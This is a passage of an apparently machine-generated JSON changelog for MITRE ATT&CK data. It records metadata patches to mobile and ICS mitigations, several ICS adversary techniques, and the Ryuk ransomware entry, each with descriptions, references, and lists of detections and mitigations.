the Verified Boot capability, which cryptographically ensures the integrity of the system partition.", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1004", + "external_id": "M1004" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:10.556000+00:00\", \"old_value\": \"2025-04-16 21:22:18.484000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "course-of-action", + "id": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:51.657000+00:00", + "modified": "2025-04-25 14:40:08.756000+00:00", + "name": "Use Recent OS Version", + "description": "New mobile operating system versions bring not only patches against discovered vulnerabilities but also often bring security architecture improvements that provide resilience against potential vulnerabilities or weaknesses that have not yet been discovered. They may also bring improvements that block use of observed adversary techniques.", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1006", + "external_id": "M1006" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:08.756000+00:00\", \"old_value\": \"2025-04-16 21:22:17.864000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "course-of-action", + "id": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-10-18 12:53:03.508000+00:00", + "modified": "2025-04-25 14:40:09.845000+00:00", + "name": "User Guidance", + "description": "Describes any guidance or training given to users to set particular configuration settings or avoid specific potentially risky behaviors.", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1011", + "external_id": "M1011" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:09.845000+00:00\", \"old_value\": \"2025-04-16 21:22:18.181000+00:00\"}}}", + "previous_version": "1.0" + } + ], + "revocations": [], + "deprecations": [], + "deletions": [] + }, + "datasources": { + "additions": [], + "major_version_changes": [], + "minor_version_changes": [], + "other_version_changes": [], + "patches": [], + "revocations": [], + "deprecations": [], + "deletions": [] + }, + "datacomponents": { + "additions": [], + "major_version_changes": [], + "minor_version_changes": [], + "other_version_changes": [], + "patches": [], + "revocations": [], + "deprecations": [], + "deletions": [] + } + }, + "ics-attack": { + "techniques": { + "additions": [], + "major_version_changes": [], + "minor_version_changes": [], + "other_version_changes": [], + "patches": [ + { + "type": "attack-pattern", + "id": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-21 17:43:26.506000+00:00", + "modified": "2025-04-25 15:16:44.679000+00:00", + "name": "Activate Firmware Update Mode", + "description": "Adversaries may activate firmware update mode on devices to prevent expected response functions from engaging in reaction to an emergency or process malfunction. For example, devices such as protection relays may have an operation mode designed for firmware installation. This mode may halt process monitoring and related functions to allow new firmware to be loaded. A device left in update mode may be placed in an inactive holding state if no firmware is provided to it. By entering and leaving a device in this mode, the adversary may deny its usual functionalities.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0800", + "external_id": "T0800" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Joe Slowik - Dragos" + ], + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Operational Databases: Device Alarm", + "Application Log: Application Log Content" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 15:16:44.679000+00:00\", \"old_value\": \"2025-04-16 21:26:10.552000+00:00\"}}}", + "previous_version": "1.0", + "changelog_mitigations": { + "shared": [ + "M0800: Authorization Enforcement", + "M0801: Access Management", + "M0802: Communication Authenticity", + "M0804: Human User Authentication", + "M0807: Network Allowlists", + "M0813: Software Process and Device Authentication", + "M0930: Network Segmentation", + "M0937: Filter Network Traffic" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0015: Application Log (Application Log Content)", + "DS0029: Network Traffic (Network Traffic Content)", + "DS0040: Operational Databases (Device Alarm)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-21 17:43:26.506000+00:00", + "modified": "2025-04-25 15:16:47.841000+00:00", + "name": "Indicator Removal on Host", + "description": "Adversaries may attempt to remove indicators of their presence on a system in an effort to cover their tracks. In cases where an adversary may feel detection is imminent, they may try to overwrite, delete, or cover up changes they have made to the device.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0872", + "external_id": "T0872" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Process: OS API Execution", + "Windows Registry: Windows Registry Key Modification", + "File: File Metadata", + "Windows Registry: Windows Registry Key Deletion", + "File: File Deletion", + "File: File Modification", + "Process: Process Creation" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 15:16:47.841000+00:00\", \"old_value\": \"2025-04-16 21:26:14.295000+00:00\"}}}", + "previous_version": "1.0", + "changelog_mitigations": { + "shared": [ + "M0922: Restrict File and Directory Permissions" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (OS API Execution)", + "DS0009: Process (Process Creation)", + "DS0017: Command (Command Execution)", + "DS0022: File (File Deletion)", + "DS0022: File (File Metadata)", + "DS0022: File (File Modification)", + "DS0024: Windows Registry (Windows Registry Key Deletion)", + "DS0024: Windows Registry (Windows Registry Key Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--2d0d40ad-22fa-4cc8-b264-072557e1364b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-21 17:43:26.506000+00:00", + "modified": "2025-04-25 15:16:45.982000+00:00", + "name": "Monitor Process State", + "description": "Adversaries may gather information about the physical process state. This information may be used to gain more information about the process itself or used as a trigger for malicious actions. The sources of process state information may vary such as, OPC tags, historian data, specific PLC block information, or network traffic.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0801", + "external_id": "T0801" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Application Log: Application Log Content" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 15:16:45.982000+00:00\", \"old_value\": \"2025-04-16 21:26:12.337000+00:00\"}}}", + "previous_version": "1.0", + "changelog_mitigations": { + "shared": [ + "M0816: Mitigation Limited or Not Effective" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0015: Application Log (Application Log Content)", + "DS0029: Network Traffic (Network Traffic Content)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-21 17:43:26.506000+00:00", + "modified": "2025-04-25 15:16:46.293000+00:00", + "name": "Program Upload", + "description": "Adversaries may attempt to upload a program from a PLC to gather information about an industrial process. Uploading a program may allow them to acquire and study the underlying logic. Methods of program upload include vendor software, which enables the user to upload and read a program running on a PLC. This software can be used to upload the target program to a workstation, jump box, or an interfacing device.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0845", + "external_id": "T0845" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow", + "Application Log: Application Log Content" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 15:16:46.293000+00:00\", \"old_value\": \"2025-04-16 21:26:12.867000+00:00\"}}}", + "previous_version": "1.0", + "changelog_mitigations": { + "shared": [ + "M0800: Authorization Enforcement", + "M0801: Access Management", + "M0802: Communication Authenticity", + "M0804: Human User Authentication", + "M0807: Network Allowlists", + "M0813: Software Process and Device Authentication", + "M0930: Network Segmentation", + "M0937: Filter Network Traffic" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0015: Application Log (Application Log Content)", + "DS0029: Network Traffic (Network Traffic Content)", + "DS0029: Network Traffic (Network Traffic Flow)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--c5e3cdbc-0387-4be9-8f83-ff5c0865f377", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-21 17:43:26.506000+00:00", + "modified": "2025-04-25 15:16:51.447000+00:00", + "name": "Screen Capture", + "description": "Adversaries may attempt to perform screen capture of devices in the control system environment. Screenshots may be taken of workstations, HMIs, or other devices that display environment-relevant process, device, reporting, alarm, or related data. These device displays may reveal information regarding the ICS process, layout, control, and related schematics. In particular, an HMI can provide a lot of important industrial process information. (Citation: ICS-CERT October 2017) Analysis of screen captures may provide the adversary with an understanding of intended operations and interactions between critical devices.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0852", + "external_id": "T0852" + }, + { + "source_name": "ICS-CERT October 2017", + "description": "ICS-CERT 2017, October 21 Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors Retrieved. 2017/10/23 ", + "url": "https://www.us-cert.gov/ncas/alerts/TA17-293A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Process: OS API Execution" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 15:16:51.447000+00:00\", \"old_value\": \"2025-04-16 21:26:18.404000+00:00\"}}}", + "previous_version": "1.0", + "changelog_mitigations": { + "shared": [ + "M0816: Mitigation Limited or Not Effective" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (OS API Execution)", + "DS0017: Command (Command Execution)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-21 17:43:26.506000+00:00", + "modified": "2025-04-25 15:16:52.173000+00:00", + "name": "Standard Application Layer Protocol", + "description": "Adversaries may establish command and control capabilities over commonly used application layer protocols such as HTTP(S), OPC, RDP, telnet, DNP3, and modbus. These protocols may be used to disguise adversary actions as benign network traffic. Standard protocols may be seen on their associated port or in some cases over a non-standard port. Adversaries may use these protocols to reach out of the network for command and control, or in some cases to other infected devices within the network.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "command-and-control" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0869", + "external_id": "T0869" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow", + "Network Traffic: Network Traffic Content" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 15:16:52.173000+00:00\", \"old_value\": \"2025-04-16 21:26:19.328000+00:00\"}}}", + "previous_version": "1.0", + "changelog_mitigations": { + "shared": [ + "M0807: Network Allowlists", + "M0930: Network Segmentation", + "M0931: Network Intrusion Prevention" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0029: Network Traffic (Network Traffic Content)", + "DS0029: Network Traffic (Network Traffic Flow)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--b7e13ee8-182c-4f19-92a4-a88d7d855d54", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-21 17:43:26.506000+00:00", + "modified": "2025-04-25 15:16:50.981000+00:00", + "name": "Theft of Operational Information", + "description": "Adversaries may steal operational information on a production environment as a direct mission outcome for personal gain or to inform future operations. This information may include design documents, schedules, rotational data, or similar artifacts that provide insight on operations. In the Bowman Dam incident, adversaries probed systems for operational data. (Citation: Mark Thompson March 2016) (Citation: Danny Yadron December 2015)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0882", + "external_id": "T0882" + }, + { + "source_name": "Mark Thompson March 2016", + "description": "Mark Thompson 2016, March 24 Iranian Cyber Attack on New York Dam Shows Future of War Retrieved. 2019/11/07 ", + "url": "https://time.com/4270728/iran-cyber-attack-dam-fbi/" + }, + { + "source_name": "Danny Yadron December 2015", + "description": "Danny Yadron 2015, December 20 Iranian Hackers Infiltrated New York Dam in 2013 Retrieved. 2019/11/07 ", + "url": "https://www.wsj.com/articles/iranian-hackers-infiltrated-new-york-dam-in-2013-1450662559" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 15:16:50.981000+00:00\", \"old_value\": \"2025-04-16 21:26:17.698000+00:00\"}}}", + "previous_version": "1.0", + "changelog_mitigations": { + "shared": [ + "M0803: Data Loss Prevention", + "M0809: Operational Information Confidentiality", + "M0922: Restrict File and Directory Permissions", + "M0941: Encrypt Sensitive Information" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [], + "new": [], + "dropped": [] + } + } + ], + "revocations": [], + "deprecations": [], + "deletions": [] + }, + "software": { + "additions": [], + "major_version_changes": [], + "minor_version_changes": [], + "other_version_changes": [], + "patches": [ + { + "type": "malware", + "id": "malware--a020a61c-423f-4195-8c46-ba1d21abba37", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-13 20:14:53.171000+00:00", + "modified": "2025-04-22 22:21:23.589000+00:00", + "name": "Ryuk", + "description": "[Ryuk](https://attack.mitre.org/software/S0446) is a ransomware designed to target enterprise environments that has been used in attacks since at least 2018. [Ryuk](https://attack.mitre.org/software/S0446) shares code similarities with Hermes ransomware.(Citation: CrowdStrike Ryuk January 2019)(Citation: FireEye Ryuk and Trickbot January 2019)(Citation: FireEye FIN6 Apr 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0446", + "external_id": "S0446" + }, + { + "source_name": "Ryuk", + "description": "(Citation: CrowdStrike Ryuk January 2019) (Citation: Bleeping Computer - Ryuk WoL) " + }, + { + "source_name": "Bleeping Computer - Ryuk WoL", + "description": "Abrams, L. (2021, January 14). Ryuk Ransomware Uses Wake-on-Lan To Encrypt Offline Devices. Retrieved February 11, 2021.", + "url": "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/" + }, + { + "source_name": "FireEye Ryuk and Trickbot January 2019", + "description": "Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html" + }, + { + "source_name": "CrowdStrike Ryuk January 2019", + "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020.", + "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/" + }, + { + "source_name": "FireEye FIN6 Apr 2019", + "description": "McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Ryuk" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Matt Brenton, Zurich Insurance Group", + "The DFIR Report" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.4", + "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-22 22:21:23.589000+00:00\", \"old_value\": \"2025-04-16 20:38:27.373000+00:00\"}}, \"iterable_item_added\": {\"root['x_mitre_contributors'][1]\": \"The DFIR Report\"}, \"iterable_item_removed\": {\"root['x_mitre_contributors'][0]\": \"The DFIR Report, @TheDFIRReport\"}}", + "previous_version": "1.4" + } + ], + "revocations": [], + "deprecations": [], + "deletions": [] + }, + "groups": { + "additions": [], + "major_version_changes": [], + "minor_version_changes": [], + "other_version_changes": [], + "patches": [], + "revocations": [], + "deprecations": [], + "deletions": [] + }, + "campaigns": { + "additions": [], + "major_version_changes": [], + "minor_version_changes": [], + "other_version_changes": [], + "patches": [], + "revocations": [], + "deprecations": [], + "deletions": [] + }, + "assets": { + "additions": [], + "major_version_changes": [], + "minor_version_changes": [], + "other_version_changes": [], + "patches": [], + "revocations": [], + "deprecations": [], + "deletions": [] + }, + "mitigations": { + "additions": [], + "major_version_changes": [], + "minor_version_changes": [], + "other_version_changes": [], + "patches": [ + { + "type": "course-of-action", + "id": "course-of-action--2f0160b7-e982-49d7-9612-f19b810f1722", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-06-06 16:39:58.291000+00:00", + "modified": "2025-04-25 14:39:12.577000+00:00", + "name": "Active Directory Configuration", + "description": "Configure Active Directory to prevent use of certain techniques; use security identifier (SID) Filtering, etc.", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0915", + "external_id": "M0915" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:39:12.577000+00:00\", \"old_value\": \"2025-04-16 21:26:26.911000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "course-of-action", + "id": "course-of-action--337c4e2a-21a7-4d9a-bfee-9efd6cebf0e5", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-11 16:32:21.854000+00:00", + "modified": "2025-04-25 14:39:13.297000+00:00", + "name": "Data Loss Prevention", + "description": "Data Loss Prevention (DLP) technologies can be used to help identify adversarial attempts to exfiltrate operational information, such as engineering plans, trade secrets, recipes, intellectual property, or process telemetry. DLP functionality may be built into other security products such as firewalls or standalone suites running on the network and host-based agents. DLP may be configured to prevent the transfer of information through corporate resources such as email, web, and physical media such as USB for host-based solutions.", + "revoked": false, + "labels": [ + "IEC 62443-3-3:2013 - SR 4.1", + "IEC 62443-4-2:2019 - CR 4.1" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0803", + "external_id": "M0803" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:39:13.297000+00:00\", \"old_value\": \"2025-04-16 21:26:27.444000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "course-of-action", + "id": "course-of-action--8bc4a54e-810c-4600-8b6c-08fa8413a401", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-11 16:32:21.854000+00:00", + "modified": "2025-04-25 14:39:16.894000+00:00", + "name": "Mechanical Protection Layers", + "description": "Utilize a layered protection design based on physical or mechanical protection systems to prevent damage to property, equipment, human safety, or the environment. Examples include interlocks, rupture disk, release values, etc. (Citation: A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004) ", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0805", + "external_id": "M0805" + }, + { + "source_name": "A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004", + "description": "A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004 APPLYING THE LATEST STANDARD FOR FUNCTIONAL SAFETY IEC 61511 Retrieved. 2020/09/17 ", + "url": "https://www.icheme.org/media/9906/xviii-paper-23.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:39:16.894000+00:00\", \"old_value\": \"2025-04-16 21:26:29.910000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "course-of-action", + "id": "course-of-action--469b78dd-a54d-4f7c-8c3b-4a1dd916b433", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-11 16:32:21.854000+00:00", + "modified": "2025-04-25 14:39:13.833000+00:00", + "name": "Mitigation Limited or Not Effective", + "description": "This type of attack technique cannot be easily mitigated with preventative controls since it is based on the abuse of system features.", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0816", + "external_id": "M0816" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:39:13.833000+00:00\", \"old_value\": \"2025-04-16 21:26:27.652000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "course-of-action", + "id": "course-of-action--99c746d7-a08a-4169-94f9-b8c0dad716fa", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-06-06 21:16:18.709000+00:00", + "modified": "2025-04-25 14:39:17.799000+00:00", + "name": "Operational Information Confidentiality", + "description": "Deploy mechanisms to protect the confidentiality of information related to operational processes, facility locations, device configurations, programs, or databases that may have information that can be used to infer organizational trade-secrets, recipes, and other intellectual property (IP).", + "revoked": false, + "labels": [ + "IEC 62443-3-3:2013 - SR 4.1", + "IEC 62443-4-2:2019 - CR 4.1" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0809", + "external_id": "M0809" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:39:17.799000+00:00\", 